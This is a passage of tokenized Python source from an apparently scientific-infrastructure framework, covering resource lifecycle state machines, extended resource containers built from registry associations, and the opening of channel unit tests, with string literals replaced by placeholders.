<EOL> schema = ret_obj . _schema <EOL> for field in ret_obj . _schema : <EOL> if schema [ field ] [ "<STR_LIT:default>" ] is None : <EOL> try : <EOL> value = IonObject ( schema [ field ] [ "<STR_LIT:type>" ] , { } ) <EOL> except NotFound : <EOL> value = None <EOL> setattr ( ret_obj , field , value ) <EOL> if hasattr ( ret_obj , '<STR_LIT>' ) : <EOL> schema_info [ '<STR_LIT>' ] [ ion_object_name ] = ret_obj . _schema <EOL> for field in ret_obj . _schema : <EOL> obj_type = ret_obj . _schema [ field ] [ '<STR_LIT:type>' ] <EOL> if is_ion_object ( obj_type ) : <EOL> try : <EOL> value = IonObject ( obj_type , { } ) <EOL> schema_info [ '<STR_LIT>' ] [ obj_type ] = value . _schema <EOL> except NotFound : <EOL> pass <EOL> elif ret_obj . _schema [ field ] . has_key ( '<STR_LIT>' ) : <EOL> if isenum ( ret_obj . _schema [ field ] [ '<STR_LIT>' ] ) : <EOL> value = IonObject ( ret_obj . _schema [ field ] [ '<STR_LIT>' ] , { } ) <EOL> schema_info [ '<STR_LIT>' ] [ ret_obj . _schema [ field ] [ '<STR_LIT>' ] ] = value . _str_map <EOL> schema_info [ '<STR_LIT:object>' ] = ret_obj <EOL> elif isenum ( resource_type ) : <EOL> schema_info [ '<STR_LIT>' ] [ resource_type ] = { } <EOL> schema_info [ '<STR_LIT>' ] [ resource_type ] = ret_obj . _str_map <EOL> else : <EOL> raise ( '<STR_LIT>' , resource_type ) <EOL> return schema_info <EOL> def get_restype_lcsm ( restype ) : <EOL> return lcs_workflows . get ( restype , None ) <EOL> def get_default_lcsm ( ) : <EOL> pass <EOL> def lcstate ( maturity , availability ) : <EOL> """<STR_LIT>""" <EOL> if not maturity and maturity not in LCS : <EOL> return BadRequest ( "<STR_LIT>" % maturity ) <EOL> if not availability and availability not in AS : <EOL> return BadRequest ( "<STR_LIT>" % availability ) <EOL> return "<STR_LIT>" % ( maturity , availability ) <EOL> def lcsplit ( lcstate ) : <EOL> """<STR_LIT>""" <EOL> return lcstate . split ( '<STR_LIT:_>' , <NUM_LIT:1> ) <EOL> def get_all_lcsm_names ( ) : <EOL> """<STR_LIT>""" <EOL> lcstates = sorted ( { lcs for lcsm in lcs_workflow_defs . values ( ) for lcs in lcsm . lcstate_states } ) <EOL> avstates = sorted ( { avs for lcsm in lcs_workflow_defs . values ( ) for avs in lcsm . availability_states } ) <EOL> fsmevents = set ( ) <EOL> for lcsm in lcs_workflow_defs . values ( ) : <EOL> for src , evt in lcsm . lcstate_transitions . keys ( ) : <EOL> fsmevents . add ( evt ) <EOL> for src , evt in lcsm . availability_transitions . keys ( ) : <EOL> fsmevents . add ( evt ) <EOL> fsmevents = sorted ( fsmevents ) <EOL> return lcstates , avstates , fsmevents <EOL> class ResourceLifeCycleSM ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , ** kwargs ) : <EOL> self . _kwargs = kwargs <EOL> self . _initialize_fsms ( ) <EOL> def _initialize_fsms ( self ) : <EOL> lc_states = self . _kwargs . get ( '<STR_LIT>' , None ) or [ ] <EOL> lc_trans = self . _kwargs . get ( '<STR_LIT>' , None ) or [ ] <EOL> self . lcstate_states , self . lcstate_transitions = self . _get_fsm_definition ( lc_states , lc_trans ) <EOL> self . initial_state = self . _kwargs . get ( '<STR_LIT>' , None ) <EOL> av_states = self . _kwargs . get ( '<STR_LIT>' , None ) or [ ] <EOL> av_trans = self . _kwargs . get ( '<STR_LIT>' , None ) or [ ] <EOL> self . availability_states , self . availability_transitions = self . _get_fsm_definition ( av_states , av_trans ) <EOL> self . initial_availability = self . _kwargs . get ( '<STR_LIT>' , None ) <EOL> self . state_aliases = { } <EOL> def _get_fsm_definition ( self , state_def , trans_def ) : <EOL> fsm_states = set ( ) <EOL> fsm_states . update ( state_def ) <EOL> fsm_transitions = { ( src , evt ) : targ for src , evt , targ in trans_def } <EOL> return fsm_states , fsm_transitions <EOL> def is_in_state ( self , current_state , query_state ) : <EOL> return ( current_state == query_state ) or ( current_state in self . state_aliases [ query_state ] ) <EOL> def _clone_with_restrictions ( self , wfargs = None ) : <EOL> wfargs = wfargs if not None else { } <EOL> clone = self . __class__ ( ** wfargs ) <EOL> clone . lcstate_states = self . lcstate_states . copy ( ) <EOL> clone . lcstate_transitions = self . lcstate_transitions . copy ( ) <EOL> clone . availability_states = self . availability_states . copy ( ) <EOL> clone . availability_transitions = self . availability_transitions . copy ( ) <EOL> clone . _apply_restrictions ( ** wfargs ) <EOL> return clone <EOL> def _apply_restrictions ( self , ** kwargs ) : <EOL> self . remove_states = kwargs . get ( '<STR_LIT>' , None ) <EOL> if self . remove_states : <EOL> trans_new = self . lcstate_transitions . copy ( ) <EOL> for ( src , evt ) , targ in self . lcstate_transitions . iteritems ( ) : <EOL> if src in self . remove_states or targ in self . remove_states : <EOL> del trans_new [ ( src , evt ) ] <EOL> self . lcstate_transitions = trans_new <EOL> self . lcstate_states = self . lcstate_states - set ( self . remove_states ) <EOL> def get_lcstate_successor ( self , current_state , transition_event ) : <EOL> """<STR_LIT>""" <EOL> return self . lcstate_transitions . get ( ( current_state , transition_event ) , None ) <EOL> def get_availability_successor ( self , current_state , transition_event ) : <EOL> """<STR_LIT>""" <EOL> return self . availability_transitions . get ( ( current_state , transition_event ) , None ) <EOL> def get_lcstate_successors ( self , some_state ) : <EOL> """<STR_LIT>""" <EOL> if some_state and "<STR_LIT:_>" in some_state : <EOL> raise BadRequest ( "<STR_LIT>" ) <EOL> return { evt : targ for ( src , evt ) , targ in self . lcstate_transitions . iteritems ( ) if src == some_state } <EOL> def get_availability_successors ( self , some_state ) : <EOL> """<STR_LIT>""" <EOL> if some_state and "<STR_LIT:_>" in some_state : <EOL> raise BadRequest ( "<STR_LIT>" ) <EOL> return { evt : targ for ( src , evt ) , targ in self . availability_transitions . iteritems ( ) if src == some_state } <EOL> def get_lcstate_predecessors ( self , some_state ) : <EOL> """<STR_LIT>""" <EOL> if some_state and "<STR_LIT:_>" in some_state : <EOL> raise BadRequest ( "<STR_LIT>" ) <EOL> return { src : evt for ( src , evt ) , targ in self . lcstate_transitions . iteritems ( ) if targ == some_state } <EOL> def get_availability_predecessors ( self , some_state ) : <EOL> """<STR_LIT>""" <EOL> if some_state and "<STR_LIT:_>" in some_state : <EOL> raise BadRequest ( "<STR_LIT>" ) <EOL> return { src : evt for ( src , evt ) , targ in self . availability_transitions . iteritems ( ) if targ == some_state } <EOL> class ExtendedResourceContainer ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , serv_prov , res_registry = None ) : <EOL> self . service_provider = serv_prov <EOL> if res_registry is not None : <EOL> self . _rr = res_registry <EOL> else : <EOL> if hasattr ( serv_prov . container , '<STR_LIT>' ) and serv_prov . container . has_capability ( '<STR_LIT>' ) : <EOL> self . _rr = serv_prov . container . resource_registry <EOL> else : <EOL> self . _rr = self . service_provider . clients . resource_registry <EOL> self . ctx = None <EOL> def create_extended_resource_container_list ( self , extended_resource_type , resource_id_list , <EOL> computed_resource_type = None , <EOL> ext_associations = None , ext_exclude = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( resource_id_list , types . ListType ) : <EOL> raise Inconsistent ( "<STR_LIT>" ) <EOL> ret = list ( ) <EOL> for res_id in resource_id_list : <EOL> ext_res = self . create_extended_resource_container ( extended_resource_type , res_id , computed_resource_type , <EOL> ext_associations , ext_exclude ) <EOL> ret . append ( ext_res ) <EOL> return ret <EOL> def create_extended_resource_container ( self , extended_resource_type , resource_id , computed_resource_type = None , <EOL> ext_associations = None , ext_exclude = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> overall_start_time = time . time ( ) <EOL> self . ctx = None <EOL> if not isinstance ( resource_id , types . StringType ) : <EOL> raise Inconsistent ( "<STR_LIT>" ) <EOL> if not self . service_provider or not self . _rr : <EOL> raise Inconsistent ( "<STR_LIT>" ) <EOL> if extended_resource_type not in getextends ( OT . ResourceContainer ) : <EOL> raise BadRequest ( '<STR_LIT>' % ( extended_resource_type , OT . ResourceContainer ) ) <EOL> if computed_resource_type and computed_resource_type not in getextends ( OT . BaseComputedAttributes ) : <EOL> raise BadRequest ( '<STR_LIT>' % ( computed_resource_type , OT . BaseComputedAttributes ) ) <EOL> resource_object = self . _rr . read ( resource_id ) <EOL> if not resource_object : <EOL> raise NotFound ( "<STR_LIT>" % resource_id ) <EOL> res_container = IonObject ( extended_resource_type ) <EOL> originResourceType = res_container . get_class_decorator_value ( '<STR_LIT>' ) <EOL> if originResourceType is None : <EOL> log . error ( '<STR_LIT>' , extended_resource_type ) <EOL> elif originResourceType != resource_object . type_ and not issubtype ( resource_object . type_ , originResourceType ) : <EOL> raise Inconsistent ( '<STR_LIT>' % ( <EOL> extended_resource_type , originResourceType , resource_object . type_ ) ) <EOL> res_container . _id = resource_object . _id <EOL> res_container . resource = resource_object <EOL> self . _prepare_context ( resource_object . _id ) <EOL> self . set_container_lcstate_info ( res_container ) <EOL> self . set_res_container_info ( res_container ) <EOL> self . set_container_field_values ( res_container , ext_exclude , ** kwargs ) <EOL> self . set_computed_attributes ( res_container , computed_resource_type , ext_exclude , ** kwargs ) <EOL> self . set_extended_associations ( res_container , ext_associations , ext_exclude ) <EOL> res_container . ts_created = get_ion_ts ( ) <EOL> overall_stop_time = time . time ( ) <EOL> log . debug ( "<STR_LIT>" , extended_resource_type , overall_stop_time - overall_start_time ) <EOL> return res_container <EOL> def set_res_container_info ( self , res_container ) : <EOL> """<STR_LIT>""" <EOL> res_container . type_version = res_container . resource . get_class_decorator_value ( '<STR_LIT>' ) <EOL> def set_container_lcstate_info ( self , res_container ) : <EOL> """<STR_LIT>""" <EOL> restype_workflow = get_restype_lcsm ( res_container . resource . type_ ) <EOL> if restype_workflow : <EOL> res_container . lcstate_transitions = restype_workflow . get_lcstate_successors ( res_container . resource . lcstate ) <EOL> res_container . availability_transitions = restype_workflow . get_availability_successors ( res_container . resource . availability ) <EOL> else : <EOL> res_container . lcstate_transitions = { LCE . RETIRE : LCS . RETIRED , LCE . DELETE : LCS . DELETED } <EOL> res_container . availability_transitions = { } <EOL> def set_container_field_values ( self , res_container , ext_exclude , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . set_object_field_values ( res_container , res_container . resource , ext_exclude , ** kwargs ) <EOL> def set_computed_attributes ( self , res_container , computed_resource_type , ext_exclude , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if not computed_resource_type or computed_resource_type is None : <EOL> return <EOL> res_container . computed = IonObject ( computed_resource_type ) <EOL> self . set_object_field_values ( res_container . computed , res_container . resource , ext_exclude , ** kwargs ) <EOL> def set_object_field_values ( self , obj , resource , ext_exclude , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> field_needs = [ ] <EOL> resource_needs = set ( ) <EOL> assoc_needs = set ( ) <EOL> final_target_types = { } <EOL> for field in obj . _schema : <EOL> if ext_exclude is not None and field in ext_exclude : <EOL> continue <EOL> for decorator in obj . _schema [ field ] [ '<STR_LIT>' ] : <EOL> field_start_time = time . time ( ) <EOL> if decorator == '<STR_LIT>' : <EOL> deco_value = obj . get_decorator_value ( field , decorator ) <EOL> method_name = deco_value if deco_value else '<STR_LIT>' + field <EOL> ret_val = self . execute_method_with_resource ( resource . _id , method_name , ** kwargs ) <EOL> if ret_val is not None : <EOL> setattr ( obj , field , ret_val ) <EOL> elif decorator == '<STR_LIT>' : <EOL> deco_value = obj . get_decorator_value ( field , decorator ) <EOL> if obj . _schema [ field ] [ '<STR_LIT:type>' ] != '<STR_LIT>' : <EOL> log . error ( '<STR_LIT>' , field ) <EOL> continue <EOL> method_name = deco_value if deco_value else '<STR_LIT>' + field <EOL> if method_name . find ( '<STR_LIT:.>' ) == - <NUM_LIT:1> : <EOL> raise Inconsistent ( '<STR_LIT>' , field ) <EOL> service_client , operation = get_remote_info ( self , method_name ) <EOL> rmi_call = method_name . split ( '<STR_LIT:.>' ) <EOL> parms = { '<STR_LIT>' : resource . _id } <EOL> parms . update ( get_method_arguments ( service_client , operation , ** kwargs ) ) <EOL> ret_val = IonObject ( OT . ServiceRequest , service_name = rmi_call [ <NUM_LIT:0> ] , service_operation = operation , request_parameters = parms ) <EOL> setattr ( obj , field , ret_val ) <EOL> elif self . is_compound_association ( decorator ) : <EOL> target_type = obj . get_decorator_value ( field , decorator ) <EOL> if target_type and '<STR_LIT:U+002C>' in target_type : <EOL> target_type , final_target_type = target_type . split ( '<STR_LIT:U+002C>' ) <EOL> final_target_types [ field ] = final_target_type <EOL> predicates = self . get_compound_association_predicates ( decorator ) <EOL> assoc_list = self . _find_associated_resources ( resource , predicates [ <NUM_LIT:0> ] , target_type ) <EOL> field_needs . append ( ( field , "<STR_LIT:A>" , ( assoc_list , predicates ) ) ) <EOL> for target_id , assoc in assoc_list : <EOL> assoc_needs . add ( ( target_id , predicates [ <NUM_LIT:1> ] ) ) <EOL> elif self . is_association_predicate ( decorator ) : <EOL> target_type = obj . get_decorator_value ( field , decorator ) <EOL> if target_type and '<STR_LIT:U+002C>' in target_type : <EOL> target_type = target_type . split ( '<STR_LIT:U+002C>' ) <EOL> assoc_list = self . _find_associated_resources ( resource , decorator , target_type ) <EOL> if obj . _schema [ field ] [ '<STR_LIT:type>' ] == '<STR_LIT:list>' : <EOL> if assoc_list : <EOL> field_needs . append ( ( field , "<STR_LIT:L>" , assoc_list ) ) <EOL> [ resource_needs . add ( target_id ) for target_id , assoc in assoc_list ] <EOL> elif obj . _schema [ field ] [ '<STR_LIT:type>' ] == '<STR_LIT:int>' : <EOL> setattr ( obj , field , len ( assoc_list ) ) <EOL> else : <EOL> if assoc_list : <EOL> first_assoc = assoc_list [ <NUM_LIT:0> ] <EOL> if len ( assoc_list ) != <NUM_LIT:1> : <EOL> log . warn ( "<STR_LIT>" , field , len ( assoc_list ) ) <EOL> field_needs . append ( ( field , "<STR_LIT:O>" , first_assoc ) ) <EOL> resource_needs . add ( first_assoc [ <NUM_LIT:0> ] ) <EOL> else : <EOL> setattr ( obj , field , None ) <EOL> else : <EOL> log . debug ( "<STR_LIT>" , decorator , field , resource . _id ) <EOL> field_stop_time = time . time ( ) <EOL> if not field_needs : <EOL> return <EOL> if assoc_needs : <EOL> assocs = self . _rr . find_associations ( anyside = list ( assoc_needs ) , id_only = False ) <EOL> self . _add_associations ( assocs ) <EOL> for field , need_type , needs in field_needs : <EOL> if need_type == '<STR_LIT:A>' : <EOL> assoc_list , predicates = needs <EOL> for target_id , assoc in assoc_list : <EOL> res_type = assoc . ot if target_id == assoc . o else assoc . st <EOL> assoc_list1 = self . _find_associated_resources ( target_id , predicates [ <NUM_LIT:1> ] , None , res_type ) <EOL> for target_id1 , assoc1 in assoc_list1 : <EOL> resource_needs . add ( target_id1 ) <EOL> res_list = self . _rr . read_mult ( list ( resource_needs ) ) <EOL> res_objs = dict ( zip ( resource_needs , res_list ) ) <EOL> for field , need_type , needs in field_needs : <EOL> if need_type == '<STR_LIT:L>' : <EOL> obj_list = [ res_objs [ target_id ] for target_id , assoc in needs ] <EOL> setattr ( obj , field , obj_list ) <EOL> elif need_type == '<STR_LIT:O>' : <EOL> target_id , assoc = needs <EOL> setattr ( obj , field , res_objs [ target_id ] ) <EOL> elif need_type == '<STR_LIT:A>' : <EOL> assoc_list , predicates = needs <EOL> obj_list = [ ] <EOL> for target_id , assoc in assoc_list : <EOL> res_type = assoc . ot if target_id == assoc . o else assoc . st <EOL> assoc_list1 = self . _find_associated_resources ( target_id , predicates [ <NUM_LIT:1> ] , None , res_type ) <EOL> obj_list . append ( [ res_objs [ target_id1 ] for target_id1 , assoc1 in assoc_list1 ] ) <EOL> result_obj_list = [ ] <EOL> for ol_nested in obj_list : <EOL> if ol_nested : <EOL> if final_target_types . has_key ( field ) : <EOL> result_obj_list . extend ( [ target_obj for target_obj in ol_nested if ( target_obj . type_ != resource . type_ and final_target_types [ field ] in target_obj . _get_extends ( ) ) ] ) <EOL> else : <EOL> result_obj_list . extend ( [ target_obj for target_obj in ol_nested if ( target_obj . type_ != resource . type_ ) ] ) <EOL> if obj . _schema [ field ] [ '<STR_LIT:type>' ] == '<STR_LIT:list>' : <EOL> if result_obj_list : <EOL> setattr ( obj , field , result_obj_list ) <EOL> elif obj . _schema [ field ] [ '<STR_LIT:type>' ] == '<STR_LIT:int>' : <EOL> setattr ( obj , field , len ( result_obj_list ) ) <EOL> else : <EOL> if result_obj_list : <EOL> if len ( result_obj_list ) != <NUM_LIT:1> : <EOL> log . warn ( "<STR_LIT>" , field , len ( result_obj_list ) ) <EOL> setattr ( obj , field , result_obj_list [ <NUM_LIT:0> ] ) <EOL> else : <EOL> setattr ( obj , field , None ) <EOL> def set_extended_associations ( self , res_container , ext_associations , ext_exclude ) : <EOL> """<STR_LIT>""" <EOL> if ext_associations is not None : <EOL> for ext_field in ext_associations : <EOL> if ext_exclude is not None and ext_field in ext_exclude : <EOL> continue <EOL> objs = self . _find_associated_resources ( res_container . resource , ext_associations [ ext_field ] ) <EOL> if objs : <EOL> res_container . ext_associations [ ext_field ] = objs <EOL> else : <EOL> res_container . ext_associations [ ext_field ] = list ( ) <EOL> def _prepare_context ( self , resource_id ) : <EOL> """<STR_LIT>""" <EOL> self . ctx = dict ( by_subject = { } , by_object = { } ) <EOL> assocs = self . _rr . find_associations ( anyside = resource_id , id_only = False ) <EOL> self . _add_associations ( assocs ) <EOL> log . debug ( "<STR_LIT>" , len ( assocs ) , resource_id ) <EOL> def _add_associations ( self , assocs ) : <EOL> """<STR_LIT>""" <EOL> by_subject = self . ctx [ '<STR_LIT>' ] <EOL> by_object = self . ctx [ '<STR_LIT>' ] <EOL> for assoc in assocs : <EOL> sub_key = ( assoc . s , assoc . p ) <EOL> if sub_key not in by_subject : <EOL> by_subject [ sub_key ] = [ ] <EOL> by_subject [ sub_key ] . append ( assoc ) <EOL> obj_key = ( assoc . o , assoc . p ) <EOL> if obj_key not in by_object : <EOL> by_object [ obj_key ] = [ ] <EOL> by_object [ obj_key ] . append ( assoc ) <EOL> def is_predicate_association ( self , predicate , predicate_type , res ) : <EOL> for predt in predicate [ predicate_type ] : <EOL> if res == predt : <EOL> return True <EOL> return False <EOL> def is_predicate_association_extension ( self , predicate , predicate_type , res ) : <EOL> for predt in predicate [ predicate_type ] : <EOL> if res in getextends ( predt ) : <EOL> return True <EOL> return False <EOL> def is_association_predicate ( self , association ) : <EOL> if association and ( association . endswith ( "<STR_LIT:>>" ) or association . endswith ( "<STR_LIT:<>" ) ) : <EOL> association = association [ : - <NUM_LIT:1> ] <EOL> return Predicates . has_key ( association ) <EOL> def is_compound_association ( self , association ) : <EOL> return CompoundAssociations . has_key ( association ) <EOL> def get_compound_association_predicates ( self , association ) : <EOL> if CompoundAssociations . has_key ( association ) : <EOL> return CompoundAssociations [ association ] [ '<STR_LIT>' ] <EOL> return list ( ) <EOL> def _allow_direction ( self , assoc_direction , direction ) : <EOL> if not assoc_direction : <EOL> return True <EOL> return assoc_direction == direction <EOL> def _find_associated_resources ( self , resource , association_predicate , target_type = None , res_type = None ) : <EOL> """<STR_LIT>""" <EOL> assoc_list = [ ] <EOL> res_type = res_type or resource . type_ <EOL> resource_id = resource if type ( resource ) is str else resource . _id <EOL> if target_type and type ( target_type ) not in ( list , tuple ) : <EOL> target_type = [ target_type ] <EOL> assoc_direction = "<STR_LIT>" <EOL> if association_predicate and ( association_predicate . endswith ( "<STR_LIT:>>" ) or association_predicate . endswith ( "<STR_LIT:<>" ) ) : <EOL> assoc_direction = association_predicate [ - <NUM_LIT:1> ] <EOL> association_predicate = association_predicate [ : - <NUM_LIT:1> ] <EOL> pred = Predicates [ association_predicate ] <EOL> if not pred : <EOL> return [ ] <EOL> if self . is_predicate_association ( pred , '<STR_LIT>' , res_type ) and self . _allow_direction ( assoc_direction , "<STR_LIT:>>" ) : <EOL> assoc_list . extend ( self . _find_associations ( resource_id , association_predicate , target_type , backward = False ) ) <EOL> if not assoc_list and not assoc_direction : <EOL> assoc_list . extend ( self . _find_associations ( resource_id , association_predicate , target_type , backward = True ) ) <EOL> elif self . is_predicate_association ( pred , '<STR_LIT>' , res_type ) and self . _allow_direction ( assoc_direction , "<STR_LIT:<>" ) : <EOL> assoc_list . extend ( self . _find_associations ( resource_id , association_predicate , target_type , backward = True ) ) <EOL> elif self . is_predicate_association_extension ( pred , '<STR_LIT>' , res_type ) and self . _allow_direction ( assoc_direction , "<STR_LIT:>>" ) : <EOL> assoc_list . extend ( self . _find_associations ( resource_id , association_predicate , target_type , backward = False ) ) <EOL> if not assoc_list and not assoc_direction : <EOL> assoc_list . extend ( self . _find_associations ( resource_id , association_predicate , target_type , backward = True ) ) <EOL> elif self . is_predicate_association_extension ( pred , '<STR_LIT>' , res_type ) and self . _allow_direction ( assoc_direction , "<STR_LIT:<>" ) : <EOL> assoc_list . extend ( self . _find_associations ( resource_id , association_predicate , target_type , backward = True ) ) <EOL> else : <EOL> log . warn ( "<STR_LIT>" , association_predicate , res_type ) <EOL> return assoc_list <EOL> def _find_associations ( self , resource_id , predicate , target_type = None , backward = False ) : <EOL> """<STR_LIT>""" <EOL> assoc_list = [ ] <EOL> if backward : <EOL> by_object = self . ctx [ '<STR_LIT>' ] . get ( ( resource_id , predicate ) , [ ] ) <EOL> assoc_list . extend ( [ ( assoc . s , assoc ) for assoc in by_object if not target_type or assoc . st in target_type ] ) <EOL> else : <EOL> by_subject = self . ctx [ '<STR_LIT>' ] . get ( ( resource_id , predicate ) , [ ] ) <EOL> assoc_list . extend ( [ ( assoc . o , assoc ) for assoc in by_subject if not target_type or assoc . ot in target_type ] ) <EOL> return assoc_list <EOL> def execute_method_with_resource ( self , resource_id , method_name , ** kwargs ) : <EOL> try : <EOL> args = [ resource_id ] <EOL> return execute_method ( self , method_name , * args , ** kwargs ) <EOL> except Unauthorized : <EOL> pass <EOL> except Exception , e : <EOL> log . error ( '<STR_LIT>' % ( method_name , resource_id , str ( e ) ) ) <EOL> return None <EOL> def create_prepare_resource_support ( self , resource_id = "<STR_LIT>" , prepare_resource_type = None , origin_resource_type = None ) : <EOL> if not isinstance ( resource_id , types . StringType ) : <EOL> raise Inconsistent ( "<STR_LIT>" ) <EOL> if not self . service_provider or not self . _rr : <EOL> raise Inconsistent ( "<STR_LIT>" ) <EOL> if prepare_resource_type is not None and prepare_resource_type not in getextends ( OT . ResourcePrepareSupport ) : <EOL> raise BadRequest ( '<STR_LIT>' % ( prepare_resource_type , OT . ResourcePrepareSupport ) ) <EOL> resource_data = IonObject ( prepare_resource_type ) <EOL> origin_resource_decorator = resource_data . get_class_decorator_value ( '<STR_LIT>' ) <EOL> if origin_resource_decorator is None and origin_resource_type is None : <EOL> raise NotFound ( '<STR_LIT>' , prepare_resource_type ) <EOL> origin_resource_type = origin_resource_type if origin_resource_type is not None else origin_resource_decorator <EOL> if origin_resource_type is None : <EOL> raise NotFound ( '<STR_LIT>' , prepare_resource_type ) <EOL> resource_object = None <EOL> if resource_id : <EOL> resource_object = self . _rr . read ( resource_id ) <EOL> if origin_resource_type != resource_object . type_ and not issubtype ( resource_object . type_ , origin_resource_type ) : <EOL> raise Inconsistent ( '<STR_LIT>' % ( <EOL> prepare_resource_type , origin_resource_type , resource_object . type_ ) ) <EOL> resource_data . _id = resource_object . _id <EOL> else : <EOL> resource_object = IonObject ( origin_resource_type ) <EOL> resource_data . resource = resource_object <EOL> resource_data . resource_schema = get_object_schema ( origin_resource_type ) <EOL> for field in resource_data . _schema : <EOL> deco_value = resource_data . get_decorator_value ( field , '<STR_LIT>' ) <EOL> assoc_dict = { } <EOL> if deco_value is not None : <EOL> if deco_value . find ( '<STR_LIT:U+002C>' ) == - <NUM_LIT:1> : <EOL> associated_resources = [ deco_value ] <EOL> else : <EOL> associated_resources = deco_value . split ( '<STR_LIT:U+002C>' ) <EOL> for res in associated_resources : <EOL> assoc = self . get_associated_resource_info ( origin_resource_type , resource_id , res ) <EOL> assoc_dict [ assoc . key ] = assoc <EOL> setattr ( resource_data , field , assoc_dict ) <EOL> continue <EOL> return resource_data <EOL> def get_associated_resource_info ( self , origin_resource_type = "<STR_LIT>" , resource_id = "<STR_LIT>" , assoc_resource_type = None ) : <EOL> if not origin_resource_type : <EOL> raise Inconsistent ( "<STR_LIT>" ) <EOL> if not isinstance ( resource_id , types . StringType ) : <EOL> raise Inconsistent ( "<STR_LIT>" ) <EOL> if not self . service_provider or not self . _rr : <EOL> raise Inconsistent ( "<STR_LIT>" ) <EOL> if assoc_resource_type is not None and assoc_resource_type not in getextends ( OT . AssociatedResources ) : <EOL> raise BadRequest ( '<STR_LIT>' % ( assoc_resource_type , OT . AssociatedResources ) ) <EOL> resource_data = IonObject ( assoc_resource_type ) <EOL> log . debug ( "<STR_LIT>" , assoc_resource_type ) <EOL> for field in resource_data . _schema : <EOL> deco_value = resource_data . get_decorator_value ( field , '<STR_LIT>' ) <EOL> if deco_value is not None : <EOL> setattr ( resource_data , '<STR_LIT>' , deco_value ) <EOL> res_list , _ = self . _rr . find_resources ( restype = deco_value , id_only = False ) <EOL> exclude_lcs_filter_value = resource_data . get_decorator_value ( field , '<STR_LIT>' ) <EOL> if exclude_lcs_filter_value is not None and exclude_lcs_filter_value . find ( '<STR_LIT:U+002C>' ) > - <NUM_LIT:1> : <EOL> exclude_filter = exclude_lcs_filter_value . split ( '<STR_LIT:U+002C>' ) <EOL> res_list = [ res for res in res_list if res . lcstate not in exclude_filter ] <EOL> res_filter_value = resource_data . get_decorator_value ( field , '<STR_LIT>' ) <EOL> if res_filter_value is not None and res_filter_value . find ( '<STR_LIT:U+002C>' ) > - <NUM_LIT:1> : <EOL> assoc_filter = res_filter_value . split ( '<STR_LIT:U+002C>' ) <EOL> res_associations = self . _rr . find_associations ( predicate = assoc_filter [ <NUM_LIT:1> ] , id_only = False ) <EOL> assoc_list = [ a for a in res_associations if a . st == assoc_filter [ <NUM_LIT:0> ] and a . ot == assoc_filter [ <NUM_LIT:2> ] ] <EOL> def resource_available ( res ) : <EOL> rel_assocs = [ a for a in assoc_list if res . _id == ( a . o if a . st == origin_resource_type else a . s ) ] <EOL> assocs = [ ( a . s if a . st == origin_resource_type else a . o ) for a in rel_assocs ] <EOL> return len ( assocs ) == <NUM_LIT:0> or resource_id in assocs <EOL> final_list = [ ] <EOL> final_list . extend ( [ res for res in res_list if resource_available ( res ) ] ) <EOL> setattr ( resource_data , field , final_list ) <EOL> else : <EOL> setattr ( resource_data , field , res_list ) <EOL> continue <EOL> deco_value = resource_data . get_decorator_value ( field , '<STR_LIT>' ) <EOL> if deco_value is not None : <EOL> if not resource_id and ( resource_data . is_decorator ( field , '<STR_LIT>' ) or <EOL> resource_data . is_decorator ( field , '<STR_LIT>' ) ) : <EOL> continue <EOL> resource_sub = resource_id if resource_data . is_decorator ( field , '<STR_LIT>' ) else None <EOL> resource_obj = resource_id if resource_data . is_decorator ( field , '<STR_LIT>' ) else None <EOL> assoc_list = self . _rr . find_associations ( subject = resource_sub , predicate = deco_value , object = resource_obj , id_only = False ) <EOL> subject_type = resource_data . get_decorator_value ( field , '<STR_LIT>' ) <EOL> if subject_type is not None : <EOL> assoc_list = [ assoc for assoc in assoc_list if ( assoc . st == subject_type ) ] <EOL> object_type = resource_data . get_decorator_value ( field , '<STR_LIT>' ) <EOL> if object_type is not None : <EOL> assoc_list = [ assoc for assoc in assoc_list if ( assoc . ot == object_type ) ] <EOL> setattr ( resource_data , field , assoc_list ) <EOL> continue <EOL> key = resource_data . get_class_decorator_value ( '<STR_LIT>' ) <EOL> if key is None : <EOL> resource_data . key = resource_data . resource_type <EOL> else : <EOL> resource_data . key = key <EOL> return resource_data <EOL> def set_service_requests ( self , service_request = None , service_name = '<STR_LIT>' , service_operation = '<STR_LIT>' , request_parameters = None ) : <EOL> assert ( service_request ) <EOL> assert ( service_name ) <EOL> assert ( service_operation ) <EOL> assert ( request_parameters ) <EOL> service_request . service_name = service_name <EOL> service_request . service_operation = service_operation <EOL> service_request . request_parameters = request_parameters if request_parameters is not None else { } <EOL> return </s>
<s> __author__ = '<STR_LIT>' <EOL> from mock import Mock , sentinel , patch , MagicMock <EOL> from gevent . event import Event <EOL> from gevent import spawn <EOL> from gevent . queue import Queue <EOL> import Queue as PQueue <EOL> import time <EOL> from nose . plugins . attrib import attr <EOL> from pyon . util . unit_test import PyonTestCase <EOL> from pyon . core import bootstrap <EOL> from pyon . core . bootstrap import CFG <EOL> from pyon . net . channel import BaseChannel , SendChannel , RecvChannel , BidirClientChannel , SubscriberChannel , ChannelClosedError , ServerChannel , ChannelError , ChannelShutdownMessage , ListenChannel , PublisherChannel <EOL> from pyon . net . transport import NameTrio , BaseTransport , AMQPTransport <EOL> from pyon . util . int_test import IonIntegrationTestCase <EOL> @ attr ( '<STR_LIT>' ) <EOL> class TestBaseChannel ( PyonTestCase ) : <EOL> def test_init ( self ) : <EOL> ch = BaseChannel ( ) <EOL> self . assertIsNone ( ch . _close_callback ) <EOL> ch = BaseChannel ( close_callback = sentinel . closecb ) <EOL> self . assertEquals ( ch . _close_callback , sentinel . closecb ) <EOL> def test_declare_exchange_point ( self ) : <EOL> ch = BaseChannel ( ) <EOL> self . assertRaises ( AssertionError , ch . _declare_exchange , None ) <EOL> transport = Mock ( ) <EOL> ch . on_channel_open ( transport ) <EOL> ch . _declare_exchange ( '<STR_LIT:hello>' ) <EOL> self . assertTrue ( transport . declare_exchange_impl . called ) <EOL> self . assertIn ( '<STR_LIT:hello>' , transport . declare_exchange_impl . call_args [ <NUM_LIT:0> ] ) <EOL> self . assertIn ( '<STR_LIT>' , transport . declare_exchange_impl . call_args [ <NUM_LIT:1> ] ) <EOL> self . assertIn ( '<STR_LIT>' , transport . 